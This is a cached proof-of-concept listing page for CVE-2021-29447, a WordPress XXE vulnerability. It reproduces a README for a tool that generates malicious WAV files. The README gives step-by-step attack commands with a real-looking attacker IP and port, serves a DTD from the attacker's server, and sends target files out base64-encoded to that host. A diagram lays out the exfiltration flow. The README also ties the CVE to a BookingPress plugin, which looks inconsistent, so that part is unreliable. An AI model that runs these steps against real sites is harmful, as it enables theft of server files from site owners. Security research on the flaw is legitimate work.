Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-29447 PoC — WordPress 代码问题漏洞

Source
https://github.com/0xricksanchez/CVE-2021-29447
Associated Vulnerability
Title:WordPress 代码问题漏洞 (CVE-2021-29447)
Description:WordPress是WordPress(Wordpress)基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 WordPress 存在代码问题漏洞,攻击者可利用该漏洞在成功的XXE攻击中可以访问内部文件。
Description
A XXE payload generator
Readme
# WAV iXML XXE Exploit Generator

Generates malicious WAV files that exploit XXE vulnerabilities in WordPress plugins parsing iXML metadata chunks (e.g., BookingPress < 1.0.11).

## Quick Start
```bash
# Generate exploit files
python3 expl.py -i 10.10.14.204 -p 9200

# Start HTTP server
python3 -m http.server 9200

# Upload exploit.wav to target
# Monitor logs for data exfiltration

# Decode exfiltrated data
echo "BASE64_STRING" | base64 -d
```

## Workflow
```
┌──────────┐    1. Upload     ┌──────────┐
│ Attacker │ ───exploit.wav──>│  Target  │
└──────────┘                   └──────────┘
     ▲                              │
     │                              │ 2. Parse XML
     │                              │
     │ 3. GET /xxe.dtd             │
     │<─────────────────────────────┘
     │
     │ 4. GET /?p=base64_data
     │<─────────────────────────────┐
     │                              │
     └─ Decode and read file        │
```

## Vulnerable Targets

- WordPress BookingPress Plugin < 1.0.11
- Any application parsing iXML chunks in WAV files without disabling external entities

## References

- [WPScan Vulnerability DB](https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5/)
- CVE: CVE-2021-29447
File Snapshot

 [4.0K]  /data/pocs/ddc902ca7f0bdbd7c3f2f1b7f4b5ff617c175b08
├── [ 28K]  expl.py
└── [1.5K]  README.md

1 directory, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.